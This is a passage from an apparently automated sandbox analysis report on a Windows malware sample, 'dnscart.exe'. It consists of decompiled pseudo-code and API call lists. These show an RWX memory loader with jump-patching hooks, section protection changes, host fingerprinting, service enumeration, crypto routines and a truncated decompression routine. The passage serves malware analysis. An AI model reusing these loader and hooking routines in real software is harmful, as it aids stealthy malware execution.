    				if(_t192 + 0xffffffc0 <= 0xfc0) {
    					_t161 = _v104;
    					_t134 =  ==  ? _t161 + 0x18 : 0x18;
    					_v112 =  ==  ? _t161 + 0x18 : 0x18;
    				}
    				_v116 = _v112;
    				if(_v92 == 0) {
    					L4:
    					_v140 =  *_v96;
    					_v144 = 0;
    					do {
    						_t107 = _v144;
    						 *((char*)(_v140 + _t107)) =  *((intOrPtr*)(_v100 + _t107));
    						_t108 = _t107 + 1;
    						_v144 = _t108;
    					} while (_t108 != 0x400);
    					_t110 =  ==  ? _v100 +  *_v108 : 0;
    					 *((intOrPtr*)(( ==  ? _v100 +  *_v108 : 0) + 0x34)) =  *_v96;
    					_t113 = VirtualProtect(_v100, 0x400, 2,  &_v44); // executed
    					_t183 = _v80;
    					_v40 =  *((intOrPtr*)(_t183 + 0x6c));
    					_v36 =  *((intOrPtr*)(_t183 + 0x70));
    					_v32 =  *((intOrPtr*)(_t183 + 0x74));
    					_v28 =  *((intOrPtr*)(_t183 + 0x68));
    					_v24 =  *((intOrPtr*)(_t183 + 0x64));
    					_v20 = _v100 +  *((intOrPtr*)(_t183 + 0x44));
    					 *((intOrPtr*)(_t210 - 0xc)) = _t183;
    					_v184 = 0;
    					_v180 = 0x78;
    					_v148 = _t113;
    					_v152 = 0;
    					_v156 = 0x78;
    					E0021104C();
    					_t210 =  *((intOrPtr*)( &_v40 + 0x10));
    					goto __eax;
    				} else {
    					_t160 =  &_v76;
    					_t203 =  ==  ? _v104 : 0;
    					_v120 = ( *(( ==  ? _v104 : 0) + 0x14) & 0x0000ffff) + _v116;
    					_v124 = _t160;
    					_v128 = _t160 + 0x10;
    					_v132 = _t160;
    					_v136 = 0;
    					while(1) {
    						_t157 = _v120;
    						_t186 =  *(_t157 + 0x24);
    						_v160 = _v136;
    						_v164 = _t186 >> 0x0000001e & 0x00000001;
    						_v168 = _t186 >> 0x1f;
    						 *_v124 = 1;
    						asm("movaps xmm0, [0x2140e0]");
    						asm("movups [eax], xmm0");
    						_v172 = _t157;
    						_t131 = VirtualProtect(_v100 +  *((intOrPtr*)(_t157 + 0xc)),  *(_t157 + 8),  *( &_v76 + (_v164 << 4) + (_v168 << 3) + ((_t186 >> 0x0000001d & 0x00000001) << 2)),  &_v44); // executed
    						_t159 = _v160 + 1;
    						_v176 = _t131;
    						_v120 = _v172 + 0x28;
    						_v136 = _t159;
    						if(_t159 == _v92) {
    							goto L4;
    						}
    					}
    					goto L4;
    				}
    			}

    APIs
      • Part of subcall function 002123F0: VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000040), ref: 00212428
    • VirtualProtect.KERNELBASE(?,00000400,00000002,00000000), ref: 002127B1
    • VirtualProtect.KERNELBASE(?,?,?,00000000), ref: 002128B6
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.240626114.0000000000210000.00000040.sdmp, Offset: 00210000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_210000_dnscart.jbxd
    C-Code - Quality: 47%
    			E00229F42() {
    				void* _t6;
    				void* _t11;
    				void* _t12;
    				void* _t18;
    				void* _t19;
    				void* _t20;
    
    				L00221B10(E00221BE0(_t11, _t12, _t18, _t19), 0x2211f0, _t18, _t19);
    				_push(0x22c0d0);
    				_push(0x64df2dad);
    				_push(0x48);
    				_t15 = E00221BE0(_t11, 0x8f7ee672, _t18, _t19);
    				L00221B10(_t3, 0x2210d0, _t18, _t19);
    				_t6 = RtlAllocateHeap(GetProcessHeap(), 0, 0x8000000); // executed
    				_t20 = _t6;
    				if(_t20 == 0) {
    					L3:
    					ExitProcess(0);
    				}
    				goto 0x231d52;
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				memset();
    				HeapFree(GetProcessHeap(), 0, _t20); // executed
    				L002215B0(_t11, _t15); // executed
    				goto L3;
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000000,08000000), ref: 00229F82
    • RtlAllocateHeap.NTDLL(00000000), ref: 00229F89
    • ExitProcess.KERNEL32 ref: 00229FBD
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    APIs
    • CreateFileMappingW.KERNELBASE ref: 00229554
    • CloseHandle.KERNEL32 ref: 0022959C
    • GetComputerNameW.KERNEL32(?,?), ref: 002295B1
    • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00229601
    • RtlAllocateHeap.NTDLL(00000000), ref: 00229608
    • _snprintf.NTDLL ref: 00229642
    • GetProcessHeap.KERNEL32(00000000,00000010), ref: 0022964E
    • HeapFree.KERNEL32(00000000), ref: 00229655
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    APIs
    • GetProcessHeap.KERNEL32 ref: 0022982E
    • RtlAllocateHeap.NTDLL(00000000), ref: 00229835
    • CloseServiceHandle.ADVAPI32 ref: 0022996E
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    C-Code - Quality: 18%
    			E00229305(WCHAR* __ecx) {
    				void* _t7;
    				short* _t8;
    				WCHAR* _t13;
    				void* _t14;
    				void* _t15;
    				void* _t16;
    				void* _t17;
    
    				_t13 = __ecx;
    				if(GetWindowsDirectoryW(??, ??) == 0) {
    					L8:
    					E00229370(_t13, _t14, _t15, _t16); // executed
    					_t7 = L002290B0(__eflags); // executed
    					return _t7;
    				} else {
    					_t8 = _t17 - 0x208;
    					if( *(_t17 - 0x208) != 0) {
    						while( *_t8 != 0x5c) {
    							_t8 = _t8 + 2;
    							_t25 =  *_t8;
    							if( *_t8 != 0) {
    								continue;
    							} else {
    								E00229370(_t13, _t14, _t15, _t16);
    								return L002290B0(_t25);
    							}
    							goto L9;
    						}
    						goto 0x231962;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("scasb");
    						asm("int3");
    						asm("int3");
    						 *(_t8 + 2) = _t13;
    						GetVolumeInformationW(_t17 - 0x208, _t13, ??, ??, ??, ??, ??, ??); // executed
    					}
    					goto L8;
    				}
    				L9:
    			}

    APIs
    • GetWindowsDirectoryW.KERNEL32 ref: 00229305
      • Part of subcall function 00229370: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\dnscart.exe,00000104), ref: 0022938C
      • Part of subcall function 00229370: OpenSCManagerW.SECHOST(00000000,00000000,00000006), ref: 00229398
      • Part of subcall function 00229370: CloseServiceHandle.SECHOST(00000000), ref: 002293AA
      • Part of subcall function 00229370: GetProcessHeap.KERNEL32(00000008,0000015C), ref: 002293C6
      • Part of subcall function 00229370: RtlAllocateHeap.NTDLL(00000000), ref: 002293CD
      • Part of subcall function 00229370: lstrlen.KERNEL32(?), ref: 002293F4
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    APIs
    • GetVolumeInformationW.KERNELBASE(?), ref: 00229355
      • Part of subcall function 00229370: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\dnscart.exe,00000104), ref: 0022938C
      • Part of subcall function 00229370: OpenSCManagerW.SECHOST(00000000,00000000,00000006), ref: 00229398
      • Part of subcall function 00229370: CloseServiceHandle.SECHOST(00000000), ref: 002293AA
      • Part of subcall function 00229370: GetProcessHeap.KERNEL32(00000008,0000015C), ref: 002293C6
      • Part of subcall function 00229370: RtlAllocateHeap.NTDLL(00000000), ref: 002293CD
      • Part of subcall function 00229370: lstrlen.KERNEL32(?), ref: 002293F4
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    APIs
    • GetFileAttributesW.KERNELBASE ref: 0022191E
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    C-Code - Quality: 30%
    			E002123F0(intOrPtr _a4, void* _a8) {
    				char _v21;
    				char _v26;
    				char _v31;
    				intOrPtr* _v36;
    				intOrPtr _v40;
    				intOrPtr* _v44;
    				intOrPtr* _v48;
    				void** _v52;
    				char* _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr* _v72;
    				intOrPtr* _v76;
    				intOrPtr* _v80;
    				void** _v84;
    				char* _v88;
    				intOrPtr _v92;
    				intOrPtr _v96;
    				char* _v100;
    				intOrPtr _v104;
    				signed int _v108;
    				signed int _v112;
    				intOrPtr _v116;
    				intOrPtr _v120;
    				intOrPtr _v124;
    				intOrPtr _v128;
    				intOrPtr _v132;
    				intOrPtr _v136;
    				intOrPtr _v140;
    				intOrPtr _v144;
    				intOrPtr _v148;
    				intOrPtr _v152;
    				intOrPtr _v156;
    				intOrPtr _v160;
    				intOrPtr _v164;
    				void* _t121;
    				intOrPtr _t143;
    				intOrPtr _t148;
    				intOrPtr _t157;
    				intOrPtr _t158;
    				void* _t162;
    				intOrPtr _t164;
    				intOrPtr _t167;
    				char* _t168;
    				void** _t173;
    				void* _t178;
    				intOrPtr _t191;
    				intOrPtr _t197;
    				intOrPtr _t214;
    				intOrPtr _t217;
    				intOrPtr* _t223;
    				void** _t232;
    				char* _t234;
    				void* _t243;
    				intOrPtr* _t244;
    
    				_v36 =  &_v21;
    				_v40 = _a4;
    				_v44 =  &_v31;
    				_v48 =  &_v26;
    				_t121 = VirtualAlloc(0, 0x10000, 0x1000, 0x40); // executed
    				_t234 =  &_v21;
    				_t168 =  &_v26;
    				_v52 = _t121;
    				_v56 =  &_v31;
    				 *_v52 = 0;
    				_v60 =  *((intOrPtr*)(_v40 + 0x3c));
    				_v64 = 4;
    				_v68 = _v40 + _v60;
    				_t130 =  ==  ? _v68 : 0;
    				_v72 = _v56 + 1;
    				_v76 = _t168 + 1;
    				_v80 = _t234 + 1;
    				_v84 =  &(_v52[1]);
    				_v88 = _t168;
    				_v92 = _v40 -  *((intOrPtr*)(( ==  ? _v68 : 0) + 0x34));
    				_v96 = _v64;
    				_v100 = _t234;
    				_v104 = 0xfffffffb - _v52;
    				_v108 = 0;
    				while(1) {
    					_t191 = _v96;
    					_v112 = _v108;
    					_v116 = _t191;
    					_t143 = _t191 + _v52;
    					 *_v56 = 0xe8;
    					 *_v72 = 0x212194 - _t143;
    					_t173 = _v52;
    					_v120 = _t143;
    					 *((intOrPtr*)(_t173 + _v116)) =  *_v44;
    					_t197 = _v116;
    					 *((char*)(_t173 + _t197 + 4)) =  *((intOrPtr*)(_v44 + 4));
    					_t148 =  *((intOrPtr*)(0x21305c + _v112 * 0xc + 4));
    					_v124 = _t148;
    					_t178 = _t148 + _v40;
    					 *_v88 = 0xe9;
    					_v128 = _v120 + 0xfffffffb - _t178;
    					_v132 = _t197 + 5;
    					 *_v76 = _v128;
    					 *_v100 = 0xe9;
    					 *_v80 = _v104 + 0xfffffffb - _v116 + _t178;
    					_v136 =  *((intOrPtr*)(0x21305c + _v112 * 0xc + 8));
    					_v140 =  *((intOrPtr*)(0x21305c + _v112 * 0xc));
    					_v144 = _v52 + _v132;
    					_v148 = 0;
    					do {
    						_t157 = _v148;
    						 *((char*)(_v144 + _t157)) =  *((intOrPtr*)(_v140 + _t157));
    						_t158 = _t157 + 1;
    						_v148 = _t158;
    					} while (_t158 != _v136);
    					_t244 = _t243 - 0x14;
    					 *_t244 = _v40;
    					_v164 = _v92;
    					_v160 = _v124;
    					_v156 = _v136;
    					_v152 = _v144;
    					E002121AC();
    					_t243 = _t244 + 0x14;
    					_t162 = _v116 + _v136;
    					_t223 = _v36;
    					_t232 = _v84;
    					 *((intOrPtr*)(_t232 + _t162)) =  *_t223;
    					 *((char*)(_t232 + _t162 + 4)) =  *((intOrPtr*)(_t223 + 4));
    					_t164 = _v40;
    					_t214 = _v124;
    					 *((intOrPtr*)(_t164 + _t214)) =  *_v48;
    					 *((char*)(_t164 + _t214 + 4)) =  *((intOrPtr*)(_v48 + 4));
    					_t167 = _v116 + 0xe + _v136;
    					_t217 = _v112 + 1;
    					_v96 = _t167;
    					_v108 = _t217;
    					if(_t217 != 0x160) {
    						continue;
    					}
    					return _t167;
    				}
    			}

    APIs
    • VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000040), ref: 00212428
    Memory Dump Source
    • Source File: 00000002.00000002.240626114.0000000000210000.00000040.sdmp, Offset: 00210000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_210000_dnscart.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.240626114.0000000000210000.00000040.sdmp, Offset: 00210000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_210000_dnscart.jbxd

    Non-executed Functions

    APIs
    • RtlAllocateHeap.NTDLL ref: 002225A4
    • CryptDuplicateHash.ADVAPI32(00000000,00000000,?), ref: 002225CA
    • memcpy.NTDLL(?,?), ref: 002225DE
    • CryptDecrypt.ADVAPI32(?,00000001,00000000,?,?), ref: 002225FA
    • CryptVerifySignatureW.ADVAPI32(?,?,00000060,00000000,00000000,?,?), ref: 00222616
    • CryptDestroyHash.ADVAPI32(?,?,?), ref: 00222629
    • GetProcessHeap.KERNEL32(00000000), ref: 0022263C
    • HeapFree.KERNEL32(00000000), ref: 00222643
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    APIs
    • GetProcessHeap.KERNEL32(?,?), ref: 00222452
    • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00222459
    • CryptDuplicateHash.ADVAPI32(?,?,?,?,?), ref: 0022247E
    • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 00222497
    • CryptEncrypt.ADVAPI32(?,00000001,?,?,?), ref: 002224B4
    • CryptDestroyHash.ADVAPI32(?,?,?,?), ref: 0022252C
    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?), ref: 0022253A
    • HeapFree.KERNEL32(00000000), ref: 00222541
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    APIs
    • CryptExportKey.ADVAPI32(00000001,00000040), ref: 002224E2
    • CryptDestroyHash.ADVAPI32(?,?,?,?), ref: 0022252C
    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?), ref: 0022253A
    • HeapFree.KERNEL32(00000000), ref: 00222541
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    C-Code - Quality: 37%
    			E00222505(void* __eax, void* __ebx, void* __edi) {
    				void* _t18;
    				void** _t20;
    				void* _t22;
    
    				 *((intOrPtr*)(_t22 - 0x14)) = 0x14;
    				 *0x22c068( *((intOrPtr*)(_t22 - 4)), 2, __ebx + 0x60, __eax);
    				_t18 =  !=  ? 1 : __edi;
    				_t20 =  *(_t22 + 8);
    				 *0x22c048( *((intOrPtr*)(_t22 - 4)));
    				if(_t18 == 0) {
    					HeapFree(GetProcessHeap(), 0,  *_t20);
    					 *_t20 = 0;
    					_t20[1] = 0;
    				}
    				return _t18;
    			}

    APIs
    • CryptGetHashParam.ADVAPI32(?,00000002,?), ref: 00222516
    • CryptDestroyHash.ADVAPI32(?,?,?,?), ref: 0022252C
    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?), ref: 0022253A
    • HeapFree.KERNEL32(00000000), ref: 00222541
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    APIs
    • EnumServicesStatusExW.ADVAPI32(?,00000000,00000030,00000003,00000000,00000000,?), ref: 0022980A
    • GetLastError.KERNEL32(?,00000000,00000030,00000003,00000000,00000000,?), ref: 00229818
    • CloseServiceHandle.ADVAPI32 ref: 0022996E
    Memory Dump Source
    • Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true
    • Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
    • Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
    • Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_220000_dnscart.jbxd
    C-Code - Quality: 50%
    			E00222E6A(void* __ebx, void* __fp0) {
    				signed int _t1688;
    				signed int _t1692;
    				void* _t2075;
    				signed int _t2086;
    				signed int _t2465;
    				void* _t2870;
    
    				_t2075 = __ebx;
    				 *(_t2870 - 0x1c) = 0xffffffff;
    				 *(_t2870 - 4) =  *(_t2870 + 0xc);
    				 *((intOrPtr*)(_t2870 - 0x18)) =  *(_t2870 + 0xc) +  *( *(_t2870 + 0x10));
    				 *(_t2870 - 0x14) =  *(_t2870 + 0x18);
    				 *((intOrPtr*)(_t2870 - 0x70)) =  *(_t2870 + 0x18) +  *( *(_t2870 + 0x1c));
    				if(( *(_t2870 + 0x20) & 0x00000004) == 0) {
    					 *(_t2870 - 0xf0) =  *(_t2870 + 0x18) -  *((intOrPtr*)(_t2870 + 0x14)) +  *( *(_t2870 + 0x1c)) - 1;
    				} else {
    					 *(_t2870 - 0xf0) = 0xffffffff;
    				}
    				 *(_t2870 - 0x88) =  *(_t2870 - 0xf0);
    				if(( *(_t2870 - 0x88) + 0x00000001 &  *(_t2870 - 0x88)) != 0 ||  *(_t2870 + 0x18) <  *((intOrPtr*)(_t2870 + 0x14))) {
    					 *( *(_t2870 + 0x1c)) = 0;
    					 *( *(_t2870 + 0x10)) = 0;
    					_t1688 = 0xfffffffd;
    				} else {
    					 *(_t2870 - 8) =  *( *(_t2870 + 8) + 4);
    					 *(_t2870 - 0xc) =  *( *(_t2870 + 8) + 0x38);
    					 *(_t2870 - 0x28) =  *( *(_t2870 + 8) + 0x20);
    					 *(_t2870 - 0x10) =  *( *(_t2870 + 8) + 0x24);
    					 *(_t2870 - 0x24) =  *( *(_t2870 + 8) + 0x28);
    					_t1692 =  *( *(_t2870 + 8) + 0x3c);
    					 *(_t2870 - 0x7c) = _t1692;
    					_t2086 =  *(_t2870 + 8);
    					_t2465 =  *_t2086;
    					 *(_t2870 - 0xf8) = _t2465;
    					if( *(_t2870 - 0xf8) <= 0x35) {
    						_t50 =  *(_t2870 - 0xf8) + 0x2255b0; // 0xcccccc20
    						switch( *((intOrPtr*)(( *_t50 & 0x000000ff) * 4 +  &M00225528))) {
    							case 0:
    								 *( *(_t2870 + 8) + 0xc) = 0;
    								 *( *(_t2870 + 8) + 8) = 0;
    								 *(_t2870 - 0x24) = 0;
    								 *(_t2870 - 0x10) =  *(_t2870 - 0x24);
    								 *(_t2870 - 0x28) =  *(_t2870 - 0x10);
    								 *(_t2870 - 8) =  *(_t2870 - 0x28);
    								 *(_t2870 - 0xc) =  *(_t2870 - 8);
    								 *( *(_t2870 + 8) + 0x1c) = 1;
    								 *( *(_t2870 + 8) + 0x10) = 1;
    								if(( *(_t2870 + 0x20) & 0x00000001) == 0) {
    									goto L48;
    								} else {
    									goto L9;
    								}
    								goto L600;
    							case 1:
    								if(0 != 0) {
    									L11:
    									 *(_t2870 - 0x1c) = 1;
    									_t2086 =  *(_t2870 + 8);
    									 *_t2086 = 1;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L10;
    									} else {
    										 *( *((intOrPtr*)(__ebp + 8)) + 8) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										L18:
    										L20:
    										if(0 != 0) {
    											L9:
    											_t2465 =  *(_t2870 - 4);
    											if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
    												 *( *(_t2870 + 8) + 8) =  *( *(_t2870 - 4)) & 0x000000ff;
    												 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    												goto L20;
    											} else {
    												L10:
    												_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    												if(_t1692 == 0) {
    													 *( *(_t2870 + 8) + 8) = 0;
    													goto L18;
    												} else {
    													goto L11;
    												}
    											}
    										} else {
    											goto L21;
    										}
    									}
    								}
    								goto L600;
    							case 2:
    								if(0 != 0) {
    									L23:
    									 *(_t2870 - 0x1c) = 1;
    									_t2086 =  *(_t2870 + 8);
    									 *_t2086 = 2;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L22;
    									} else {
    										 *( *((intOrPtr*)(__ebp + 8)) + 0xc) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										L30:
    										L32:
    										if(0 != 0) {
    											L21:
    											_t2465 =  *(_t2870 - 4);
    											if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
    												 *( *(_t2870 + 8) + 0xc) =  *( *(_t2870 - 4)) & 0x000000ff;
    												 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    												goto L32;
    											} else {
    												L22:
    												_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    												if(_t1692 == 0) {
    													 *( *(_t2870 + 8) + 0xc) = 0;
    													goto L30;
    												} else {
    													goto L23;
    												}
    											}
    										} else {
    											if((( *( *(_t2870 + 8) + 8) << 8) +  *( *(_t2870 + 8) + 0xc)) % 0x1f != 0 || ( *( *(_t2870 + 8) + 0xc) & 0x00000020) != 0 || ( *( *(_t2870 + 8) + 8) & 0x0000000f) != 8) {
    												 *(_t2870 - 0x110) = 1;
    											} else {
    												 *(_t2870 - 0x110) = 0;
    											}
    											_t1692 =  *(_t2870 - 0x110);
    											 *(_t2870 - 0x10) = _t1692;
    											_t2086 =  *(_t2870 + 0x20) & 0x00000004;
    											if(_t2086 == 0) {
    												_t1692 = 1 << ( *( *(_t2870 + 8) + 8) >> 4) + 8;
    												if(1 > 0x8000) {
    													L42:
    													 *(_t2870 - 0x10c) = 1;
    												} else {
    													_t1692 = 1 << ( *( *(_t2870 + 8) + 8) >> 4) + 8;
    													if( *(_t2870 - 0x88) + 1 < 1) {
    														goto L42;
    													} else {
    														 *(_t2870 - 0x10c) = 0;
    													}
    												}
    												_t2086 =  *(_t2870 - 0x10) |  *(_t2870 - 0x10c);
    												 *(_t2870 - 0x10) = _t2086;
    											}
    											if( *(_t2870 - 0x10) == 0) {
    												goto L48;
    											} else {
    												goto L45;
    											}
    										}
    									}
    								}
    								goto L600;
    							case 3:
    								if(0 != 0) {
    									goto L51;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L50;
    									} else {
    										 *(__ebp - 0xe4) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L58;
    									}
    								}
    								goto L600;
    							case 4:
    								if(0 != 0) {
    									goto L67;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L66;
    									} else {
    										 *(__ebp - 0xb0) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L74;
    									}
    								}
    								goto L600;
    							case 5:
    								if(0 != 0) {
    									goto L86;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L85;
    									} else {
    										 *(__ebp - 0xec) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L93;
    									}
    								}
    								goto L600;
    							case 6:
    								if(0 != 0) {
    									goto L101;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L100;
    									} else {
    										 *((char*)( *((intOrPtr*)(__ebp + 8)) +  *((intOrPtr*)(__ebp - 0x10)) + 0x2920)) =  *( *(__ebp - 4));
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L108;
    									}
    								}
    								goto L600;
    							case 7:
    								if(0 != 0) {
    									goto L141;
    								} else {
    									goto L140;
    								}
    								goto L600;
    							case 8:
    								if(0 == 0) {
    								}
    								goto L165;
    							case 9:
    								if(0 != 0) {
    									goto L193;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L192;
    									} else {
    										 *(__ebp - 0xe0) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L200;
    									}
    								}
    								goto L600;
    							case 0xa:
    								if(0 != 0) {
    									goto L215;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L214;
    									} else {
    										 *(__ebp - 0xc0) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L222;
    									}
    								}
    								goto L600;
    							case 0xb:
    								if(0 != 0) {
    									goto L293;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L292;
    									} else {
    										 *(__ebp - 0xb4) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L300;
    									}
    								}
    								goto L600;
    							case 0xc:
    								if(0 == 0) {
    								}
    								goto L318;
    							case 0xd:
    								if(0 != 0) {
    									goto L325;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L324;
    									} else {
    										 *(__ebp - 0xbc) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L332;
    									}
    								}
    								goto L600;
    							case 0xe:
    								if(0 == 0) {
    								}
    								goto L344;
    							case 0xf:
    								if(0 != 0) {
    									goto L367;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L366;
    									} else {
    										 *(__ebp - 0xc4) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L374;
    									}
    								}
    								goto L600;
    							case 0x10:
    								if(0 != 0) {
    									goto L390;
    								} else {
    									goto L389;
    								}
    								goto L600;
    							case 0x11:
    								if(0 != 0) {
    									goto L424;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L423;
    									} else {
    										 *(__ebp - 0xa4) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L431;
    									}
    								}
    								goto L600;
    							case 0x12:
    								if(0 != 0) {
    									goto L454;
    								} else {
